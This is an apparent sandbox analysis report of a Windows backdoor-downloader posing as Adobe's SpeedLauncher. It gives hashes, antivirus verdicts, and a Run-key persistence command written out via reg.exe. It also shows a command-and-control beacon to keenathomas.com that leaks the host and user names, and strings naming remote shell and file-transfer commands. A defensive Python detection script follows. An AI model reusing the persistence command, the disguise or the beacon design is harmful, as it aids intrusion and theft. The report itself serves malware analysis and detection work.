Analysis Date: 2014-01-03 10:51:54
MD5: 1ce4605e771a04e375e0d1083f183e8e
SHA1: 8351103946b0664ace5384b09a978fdf49c85b90

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4 sha1: 569a2df945e22f828a868388e0623aafe89122f7 size: 9728
Section .rdata md5: 7df1e22dadbdcf85ea4f531e5aa7147e sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f size: 3072
Section .data  md5: 634afa8a8a75905583d99417ab7a28e3 sha1: 97d25c49beaf7920ca45daaaf5a74208608e0861 size: 2560
Section .rsrc  md5: 9721dcc7e94f7acf151c715cd34476f4 sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3 size: 1024
Timestamp: 2009-02-05 07:14:01
Version:
  LegalCopyright: Copyright Adobe Systems Incorporated 2004
  FileVersion: 8, 0, 0, 0
  CompanyName: Adobe Systems Incorporated
  Comments:
  ProductName: Adobe Acrobat
  ProductVersion: 8, 0, 0, 0
  FileDescription: Adobe Acrobat SpeedLauncher
  OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0
PEhash: 9cdb7e791d9adb73e14aee04eea88c3006d3c666
AV Arcabit (arcavir): Gen:Variant.Graftor.54419
AV Authentium: W32/Threat-SysAdderSml!Eldorado
AV Grisoft (avg): Error Scanning File
AV Avira (antivir): TR/Downloader.Gen
AV Alwil (avast): Trojan-gen
AV Alwil (avast): Win32:Trojan-gen
AV Ad-Aware: Gen:Variant.Graftor.54419
AV BitDefender: Gen:Variant.Graftor.54419
AV BullGuard: Gen:Variant.Graftor.54419
AV ClamAV: Win.Downloader.74679-1
AV Dr. Web: Trojan.DownLoader5.18772
AV Emsisoft: Gen:Variant.Graftor.54419
AV MicroWorld (escan): Gen:Variant.Graftor.54419
AV CA (E-Trust Ino): Gen:Variant.Graftor.54419
AV Fortinet: W32/Agent.OIJ!tr
AV Frisk (f-prot): W32/Threat-SysAdderSml!Eldorado
AV F-Secure: Gen:Variant.Graftor.54419
AV Ikarus: Trojan-Dropper.Agent
AV K7: Trojan ( 000e9c581 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: No Virus
AV Mcafee: BackDoor-FALR!1CE4605E771A
AV Microsoft Security Essentials: Backdoor:Win32/Likseput.A
AV NANO: Trojan.Win32.Agent.brpqg
AV Eset (nod32): Win32/Agent.OIG
AV Padvish: Malware.Trojan.Downloader-74679
AV CAT (quickheal): Backdoor.Likseput.B3
AV Rising: Trojan.Win32.Generic.1444B634
AV 360 Safe: No Virus
AV SUPERAntiSpyware: No Virus
AV Symantec: Trojan Horse
AV Trend Micro: TROJ_DLOADER.YXJ
AV Twister: Trojan.9C0E0050BD8AEFA0
AV VirusBlokAda (vba32): TrojanDownloader.Agent
AV Windows Defender: Backdoor:Win32/Likseput.A
AV Zillya!: No Virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Process: reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates Mutex: GLOBAL\ADR32
Winsock URL: http://www.keenathomas.com/index.htm

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝ C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00

Network Details:

DNS: keenathomas.com
Type: A
66.147.244.131
DNS: www.keenathomas.com
Type: A
HTTP GET: http://www.keenathomas.com/index.htm
User-Agent: 5.1 02:14 COMPUTER-XXXXXX\Administrator
Flows TCP: 192.168.1.1:1031 ➝ 66.147.244.131:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e68 746d2048   GET /index.htm H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 20352e31 2030323a 31342043   ent: 5.1 02:14 C
0x00000030 (00048)   4f4d5055 5445522d 58585858 58585c41   OMPUTER-XXXXXX\A
0x00000040 (00064)   646d696e 69737472 61746f72 0d0a486f   dministrator..Ho
0x00000050 (00080)   73743a20 7777772e 6b65656e 6174686f   st: www.keenatho
0x00000060 (00096)   6d61732e 636f6d0d 0a436163 68652d43   mas.com..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a                              ....
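Worked example (added here; not part of the sandbox report and not code from the sample): the beacon above is worth a second look, because its User-Agent is not a browser string but a host fingerprint. The Strings section contains the format string "%d.%d %02d:%02d %s\%s" next to imports of GetVersionExA, GetLocalTime, GetComputerNameA and GetUserNameA, and the captured value "5.1 02:14 COMPUTER-XXXXXX\Administrator" lines up with OS major.minor (5.1 is Windows XP), local HH:MM, and computername\username. That field mapping is an inference from those two facts, not something the report states. The script below rebuilds the request bytes from the Raw Pcap hex dump (copied from the report, embedded so it runs offline), parses the HTTP request, decodes the leaked host details from the User-Agent, and separately matches the reg.exe Run-key command line from the Runtime Details in both the unquoted form the sandbox rendered and the quoted form the binary's own format string `add "HKCU\%s" /v "%s" /d "%s" /f` would produce. All function and regex names are mine.

```python
import re

# Hex dump copied from the report's "Raw Pcap" section (the sample's single
# HTTP GET to www.keenathomas.com); embedded so the example runs offline.
RAW_PCAP_DUMP = r"""
0x00000000 (00000)   47455420 2f696e64 65782e68 746d2048   GET /index.htm H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 20352e31 2030323a 31342043   ent: 5.1 02:14 C
0x00000030 (00048)   4f4d5055 5445522d 58585858 58585c41   OMPUTER-XXXXXX\A
0x00000040 (00064)   646d696e 69737472 61746f72 0d0a486f   dministrator..Ho
0x00000050 (00080)   73743a20 7777772e 6b65656e 6174686f   st: www.keenatho
0x00000060 (00096)   6d61732e 636f6d0d 0a436163 68652d43   mas.com..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a                              ....
"""

# reg.exe command line copied from the report's "Creates Process" entry.
REPORT_REG_CMDLINE = (
    r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
    r"/v Adobe Reader Speed Launcher "
    r"/d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f"
)

_HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2,8}$")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from the report's dump layout: hex offset, decimal
    offset in parentheses, up to four 4-byte hex groups, then an ASCII column
    that is ignored (it is lossy: non-printables are rendered as '.')."""
    out = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        for tok in tokens[2:6]:          # at most four hex groups per line
            if not _HEX_GROUP.match(tok):
                break                    # reached the ASCII column
            out += bytes.fromhex(tok)
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line plus headers (names
    lower-cased); whatever follows the blank line is returned as the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for field in lines[1:]:
        name, _, value = field.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


# Format string from the sample's strings: "%d.%d %02d:%02d %s\%s".
# Field meaning (OS major.minor, local HH:MM, computer\user) is inferred from
# the captured value and the GetVersionExA/GetLocalTime/GetComputerNameA/
# GetUserNameA imports, not stated by the report.
_BEACON_UA = re.compile(r"^(\d+)\.(\d+) (\d{2}):(\d{2}) ([^\\]+)\\(.+)$")


def parse_beacon_user_agent(ua: str):
    """Return the host details leaked in the beacon User-Agent, or None when
    the header does not follow the sample's format."""
    m = _BEACON_UA.match(ua)
    if not m:
        return None
    major, minor, hh, mm, computer, user = m.groups()
    return {"os_version": f"{major}.{minor}", "local_time": f"{hh}:{mm}",
            "computer": computer, "user": user}


# Accepts the command both unquoted (as the sandbox rendered it) and quoted
# (as the binary's format string  add "HKCU\%s" /v "%s" /d "%s" /f  emits it).
_REG_RUN_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER)'
    r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"?'
    r'\s+/v\s+"?(.+?)"?\s+/d\s+"?(.+?)"?\s+/f',
    re.IGNORECASE,
)


def flag_run_key_persistence(cmdline: str):
    """Extract the Run-key value a reg.exe command line installs and flag the
    value name / payload path seen in this report; None if not a Run-key add."""
    m = _REG_RUN_ADD.search(cmdline)
    if not m:
        return None
    value, data = m.group(1), m.group(2)
    return {"value": value, "data": data,
            "matches_report": value == "Adobe Reader Speed Launcher"
            and data.lower().endswith(r"\adobe\reader_sl.exe")}


def analyze_capture(dump: str) -> dict:
    """Decode the dump, parse the request and return the pivot points."""
    req = parse_http_request(parse_hexdump(dump))
    return {"host": req["headers"].get("host"),
            "request": f'{req["method"]} {req["path"]}',
            "beacon": parse_beacon_user_agent(req["headers"].get("user-agent", ""))}


if __name__ == "__main__":
    print(analyze_capture(RAW_PCAP_DUMP))
    print(flag_run_key_persistence(REPORT_REG_CMDLINE))
```

The User-Agent regex is the useful detection artifact: a proxy log line whose UA is two integers, a clock time and a `HOST\user` pair is not a browser, and the trailing `Cache-Control: no-cache` with no `Accept` header reinforces that. The Run-key matcher is deliberately loose about quoting and the HKCU spelling so it also catches the command as process-creation telemetry would record it.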


Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVj VV
PVVVWV
PVVVWVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
SSSh<W@
SSSVSS
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t<Ht2Ht(Ht
t:h(U@
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
W95hX@
WaitForSingleObject
whoami
width=
WININET.dll
WPh@R@
WriteConsoleInputA
WriteFile
_XcptFilter
Yt7@PV
YtEj/U
YYSSSSS
YYSSSVSS
YYSSVUS
YYt5j\
YYWWVh50@
YYWWVhp/@
ZbRich